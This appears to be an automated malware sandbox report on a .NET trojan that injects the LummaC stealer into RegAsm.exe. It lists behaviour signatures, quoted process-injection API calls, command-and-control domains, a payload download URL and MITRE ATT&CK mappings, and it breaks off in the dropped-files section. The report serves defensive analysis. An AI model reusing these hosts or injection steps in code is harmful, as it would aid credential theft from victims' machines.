    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeWindow / User API: threadDelayed 1173Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6756Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 5920Thread sleep count: 3224 > 30Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 5920Thread sleep count: 1173 > 30Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6328Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6820Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6692Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6720Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`3
    Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1252293838.0000000000A03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEE
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00433FA0 LdrInitializeThunk,3_2_00433FA0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    .NET source code references suspicious native API functions
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, massiv, bufferSize, ref bytesRead)
    Allocates memory in foreign processes
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
    Injects a PE file into a foreign processes
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
    LummaC encrypted strings found
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: caffegclasiqwp.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stamppreewntnq.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stagedchheiqwo.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: millyscroqwp.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: evoliutwoqm.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: condedqpwqm.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: traineiwnqo.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: locatedblsoqp.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: miracledzmnqwui.shop
    Writes to foreign memory regions
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 438000Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C2A008Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		311
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Disable or Modify Tools    		LSASS Memory1
    Process Discovery    		Remote Desktop Protocol2
    Clipboard Data    		11
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)Logon Script (Windows)31
    Virtualization/Sandbox Evasion    		Security Account Manager31
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
    Process Injection    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture124
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Deobfuscate/Decode Files or Information    		LSA Secrets22
    System Information Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
    Obfuscated Files or Information    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Timestomp    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    http://147.45.44.131/files/u888.exe0%Avira URL Cloudsafe
    miracledzmnqwui.shop100%Avira URL Cloudphishing
    stamppreewntnq.shop100%Avira URL Cloudphishing
    evoliutwoqm.shop0%Avira URL Cloudsafe
    https://traineiwnqo.shop/.%100%Avira URL Cloudmalware
    condedqpwqm.shop100%Avira URL Cloudphishing
    https://traineiwnqo.shop/apim100%Avira URL Cloudmalware
    https://locatedblsoqp.shop/api100%Avira URL Cloudmalware
    https://traineiwnqo.shop/api100%Avira URL Cloudmalware
    https://traineiwnqo.shop/&%100%Avira URL Cloudmalware
    locatedblsoqp.shop100%Avira URL Cloudphishing
    millyscroqwp.shop100%Avira URL Cloudmalware
    http://147.45.44.131/files/u888.exeP0%Avira URL Cloudsafe
    https://miracledzmnqwui.shop/api100%Avira URL Cloudmalware
    caffegclasiqwp.shop100%Avira URL Cloudmalware
    https://traineiwnqo.shop/100%Avira URL Cloudmalware
    http://147.45.44.1310%Avira URL Cloudsafe
    stagedchheiqwo.shop100%Avira URL Cloudphishing
    traineiwnqo.shop100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    miracledzmnqwui.shop
    		188.114.96.3
    		truetrue
      		unknown
      locatedblsoqp.shop
      		188.114.97.3
      		truetrue
        		unknown
        traineiwnqo.shop
        		188.114.97.3
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://locatedblsoqp.shop/apitrue
          • Avira URL Cloud: malware
          		unknown
          miracledzmnqwui.shoptrue
          • Avira URL Cloud: phishing
          		unknown
          https://traineiwnqo.shop/apitrue
          • Avira URL Cloud: malware
          		unknown
          condedqpwqm.shoptrue
          • Avira URL Cloud: phishing
          		unknown
          stamppreewntnq.shoptrue
          • Avira URL Cloud: phishing
          		unknown
          evoliutwoqm.shoptrue
          • Avira URL Cloud: safe
          		unknown
          http://147.45.44.131/files/u888.exefalse
          • Avira URL Cloud: safe
          		unknown
          locatedblsoqp.shoptrue
          • Avira URL Cloud: phishing
          		unknown
          caffegclasiqwp.shoptrue
          • Avira URL Cloud: malware
          		unknown
          https://miracledzmnqwui.shop/apitrue
          • Avira URL Cloud: malware
          		unknown
          millyscroqwp.shoptrue
          • Avira URL Cloud: malware
          		unknown
          stagedchheiqwo.shoptrue
          • Avira URL Cloud: phishing
          		unknown
          traineiwnqo.shoptrue
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://traineiwnqo.shop/.%RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://traineiwnqo.shop/&%RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://traineiwnqo.shop/apimRegAsm.exe, 00000003.00000002.1291749878.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://147.45.44.131/files/u888.exePSecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.0000000002781000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://traineiwnqo.shop/RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://147.45.44.131SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          147.45.44.131
          		unknownRussian Federation
          		2895FREE-NET-ASFREEnetEUfalse
          188.114.97.3
          		locatedblsoqp.shopEuropean Union
          		13335CLOUDFLARENETUStrue
          188.114.96.3
          		miracledzmnqwui.shopEuropean Union
          		13335CLOUDFLARENETUStrue

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1500506
          Start date and time:2024-08-28 15:28:07 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 40s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:21
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@5/1@3/3
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 97%
          • Number of executed functions: 24
          • Number of non-executed functions: 47
          Cookbook Comments:
          • Found application associated with file extension: .exe

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
          • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

          Simulations

          Behavior and APIs

          TimeTypeDescription
          09:29:02API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe modified
          09:29:06API Interceptor2x Sleep call for process: RegAsm.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          147.45.44.131SecuriteInfo.com.Trojan.InjectNET.17.22811.18368.exeGet hashmaliciousLummaCBrowse
          • 147.45.44.131/files/Wpm.exe
          SecuriteInfo.com.Trojan.InjectNET.17.22463.10190.exeGet hashmaliciousLummaCBrowse
          • 147.45.44.131/files/6656.exe
          SecuriteInfo.com.Trojan.InjectNET.17.16891.19765.exeGet hashmaliciousLummaCBrowse
          • 147.45.44.131/files/Wpm2.exe
          SecuriteInfo.com.Trojan.InjectNET.17.11380.16691.exeGet hashmaliciousLummaCBrowse
          • 147.45.44.131/files/421.exe
          Selenium.exeGet hashmaliciousLummaCBrowse
          • 147.45.44.131/files/i999.exe
          RunPE.exeGet hashmaliciousLummaCBrowse
          • 147.45.44.131/files/WWW.exe
          SecuriteInfo.com.Trojan.InjectNET.17.9325.13976.exeGet hashmaliciousLummaCBrowse
          • 147.45.44.131/files/r57.exe
          SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exeGet hashmaliciousLummaCBrowse
          • 147.45.44.131/files/pp.exe
          SecuriteInfo.com.Trojan.InjectNET.17.22691.19885.exeGet hashmaliciousLummaCBrowse
          • 147.45.44.131/files/98.exe
          SecuriteInfo.com.Trojan.InjectNET.17.26904.26035.exeGet hashmaliciousLummaCBrowse
          • 147.45.44.131/files/98.exe
          188.114.97.3file.exeGet hashmaliciousLummaCBrowse
          • joxi.net/4Ak49WQH0GE3Nr.mp3
          Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
          • web.ad87h92j.com/4/t.bmp
          nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
          • web.ad87h92j.com/4/t.bmp
          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
          • filetransfer.io/data-package/0U9QqTZ6/download
          QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • filetransfer.io/data-package/e0pM9Trc/download
          steam_module_x64.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
          • 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
          http://membership.garenaa.id.vn/css/tunnel.aspx/manager10.jspGet hashmaliciousUnknownBrowse
          • membership.garenaa.id.vn/user/login/images/fb_ico.png
          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
          • lysyvan.com/login.php
          700987654656676.exeGet hashmaliciousDBatLoader, FormBookBrowse
          • www.coinwab.com/kqqj/?eJ=7HHhUI7NBywWL5iw6vBoOC1R9nc6cE2Y1UmgCStXrWBBqhu9PJUZU2f6gs8mUMG7LvvYO9vLlwJ8Ne8neaHQQZFpXb2jdQdMFopJRCp5HeIQieixqdhWtgQ=&zPCT=URo4h
          PI#220824.exeGet hashmaliciousFormBookBrowse
          • www.bbyul.shop/1i58/

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          traineiwnqo.shopsatellites.exeGet hashmaliciousLummaCBrowse
          • 188.114.96.3
          satellites.exeGet hashmaliciousLummaCBrowse
          • 188.114.96.3
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 188.114.96.3
          file.exeGet hashmaliciousLummaC, VidarBrowse
          • 188.114.97.3
          file.exeGet hashmaliciousLummaC, VidarBrowse
          • 188.114.97.3
          file.exeGet hashmaliciousLummaC, VidarBrowse
          • 188.114.96.3
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 188.114.97.3
          file.exeGet hashmaliciousLummaC, VidarBrowse
          • 188.114.97.3
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 188.114.96.3
          file.exeGet hashmaliciousLummaC, VidarBrowse
          • 188.114.97.3
          locatedblsoqp.shoppcsx2-v2.0.2-windows.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          CcPVItZy6w.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          CcPVItZy6w.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          file.exeGet hashmaliciousLummaCBrowse
          • 188.114.96.3
          Setup_v1.43.exeGet hashmaliciousLummaCBrowse
          • 188.114.96.3
          egaAfKJAg6.exeGet hashmaliciousLummaCBrowse
          • 188.114.96.3
          3E4lHODAzI.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          XM7drU6O3G.exeGet hashmaliciousLummaCBrowse
          • 188.114.96.3
          file.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          Setup.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          miracledzmnqwui.shopSecuriteInfo.com.Trojan.InjectNET.17.22811.18368.exeGet hashmaliciousLummaCBrowse
          • 188.114.96.3
          SecuriteInfo.com.Trojan.InjectNET.17.22463.10190.exeGet hashmaliciousLummaCBrowse
          • 188.114.96.3
          SecuriteInfo.com.Trojan.InjectNET.17.16891.19765.exeGet hashmaliciousLummaCBrowse
          • 188.114.96.3
          SecuriteInfo.com.Trojan.InjectNET.17.11380.16691.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          Selenium.exeGet hashmaliciousLummaCBrowse
          • 188.114.96.3
          SecuriteInfo.com.Trojan.InjectNET.17.9325.13976.exeGet hashmaliciousLummaCBrowse
          • 188.114.96.3
          SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CLOUDFLARENETUShttps://google.mg/url?hl=en&q=https://google.nr/url?q=Gl7qws6TcZ&rct=4214&sa=t&esrc=vax&source=Gl7qws6TcZ&cd=Nzpn8b&cad=Gl7qws6TcZD5&ved=Gl7qws6TcZ84214G&uact=82299&url=amp%2Fgoogle.com.pg/amp/cli.re/rp5Y1r#YW5kcmV3QGhlZWRkaWdpdGFsbWVkaWEuY29t%2F&opi=256371986142&usg=lxfGUQNysmkDx&source=gmail&ust=5108318229914681&usg=AOGl7qws6TcZjng81rOWFwZGl7qws6TcZqR81Get hashmaliciousHTMLPhisherBrowse
          • 104.26.15.4
          mmclaughlin-In Service Agreement-41918.pdfGet hashmaliciousHTMLPhisherBrowse
          • 104.17.25.14
          mbda-us.comAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
          • 188.114.96.3
          https://berajpaints.com.pk/tag/dolor/Get hashmaliciousUnknownBrowse
          • 104.17.25.14
          http://jop2024.sciencesconf.org/Get hashmaliciousUnknownBrowse
          • 104.17.249.203
          file.exeGet hashmaliciousUnknownBrowse
          • 172.64.41.3
          mbda-us.comAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
          • 104.17.25.14
          Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
          • 104.17.25.14
          https://hattenforlag.seGet hashmaliciousUnknownBrowse
          • 104.18.95.41
          eicar-adobe-acrobat-attachment.pdfGet hashmaliciousEICARBrowse
          • 172.64.41.3
          CLOUDFLARENETUShttps://google.mg/url?hl=en&q=https://google.nr/url?q=Gl7qws6TcZ&rct=4214&sa=t&esrc=vax&source=Gl7qws6TcZ&cd=Nzpn8b&cad=Gl7qws6TcZD5&ved=Gl7qws6TcZ84214G&uact=82299&url=amp%2Fgoogle.com.pg/amp/cli.re/rp5Y1r#YW5kcmV3QGhlZWRkaWdpdGFsbWVkaWEuY29t%2F&opi=256371986142&usg=lxfGUQNysmkDx&source=gmail&ust=5108318229914681&usg=AOGl7qws6TcZjng81rOWFwZGl7qws6TcZqR81Get hashmaliciousHTMLPhisherBrowse
          • 104.26.15.4
          mmclaughlin-In Service Agreement-41918.pdfGet hashmaliciousHTMLPhisherBrowse
          • 104.17.25.14
          mbda-us.comAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
          • 188.114.96.3
          https://berajpaints.com.pk/tag/dolor/Get hashmaliciousUnknownBrowse
          • 104.17.25.14
          http://jop2024.sciencesconf.org/Get hashmaliciousUnknownBrowse
          • 104.17.249.203
          file.exeGet hashmaliciousUnknownBrowse
          • 172.64.41.3
          mbda-us.comAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
          • 104.17.25.14
          Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
          • 104.17.25.14
          https://hattenforlag.seGet hashmaliciousUnknownBrowse
          • 104.18.95.41
          eicar-adobe-acrobat-attachment.pdfGet hashmaliciousEICARBrowse
          • 172.64.41.3
          FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousLummaC, VidarBrowse
          • 147.45.68.138
          file.exeGet hashmaliciousLummaC, VidarBrowse
          • 147.45.68.138
          file.exeGet hashmaliciousLummaC, VidarBrowse
          • 147.45.68.138
          file.exeGet hashmaliciousStealc, VidarBrowse
          • 147.45.47.253
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 147.45.68.138
          file.exeGet hashmaliciousLummaC, VidarBrowse
          • 147.45.68.138
          file.exeGet hashmaliciousRedLineBrowse
          • 147.45.47.251
          file.exeGet hashmaliciousUnknownBrowse
          • 147.45.44.168
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 147.45.68.138
          file.exeGet hashmaliciousLummaC, VidarBrowse
          • 147.45.68.138

          JA3 Fingerprints

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          a0e9f5d64349fb13191bc781f81f42e1pcsx2-v2.0.2-windows.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          • 188.114.96.3
          qbvytVOPN0.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
          • 188.114.97.3
          • 188.114.96.3
          CcPVItZy6w.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          • 188.114.96.3
          709876765465.exeGet hashmaliciousDBatLoader, FormBookBrowse
          • 188.114.97.3
          • 188.114.96.3
          f8Y5y07yHi.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
          • 188.114.97.3
          • 188.114.96.3
          qbvytVOPN0.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
          • 188.114.97.3
          • 188.114.96.3
          kUL53PJUsV.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
          • 188.114.97.3
          • 188.114.96.3
          CcPVItZy6w.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          • 188.114.96.3
          satellites.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          • 188.114.96.3
          satellites.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          • 188.114.96.3

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe.log

          Download File
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
          File Type:CSV text
          Category:dropped
          Size (bytes):847
          Entropy (8bit):5.345615485833535
          Encrypted:false
          SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
          MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
          SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
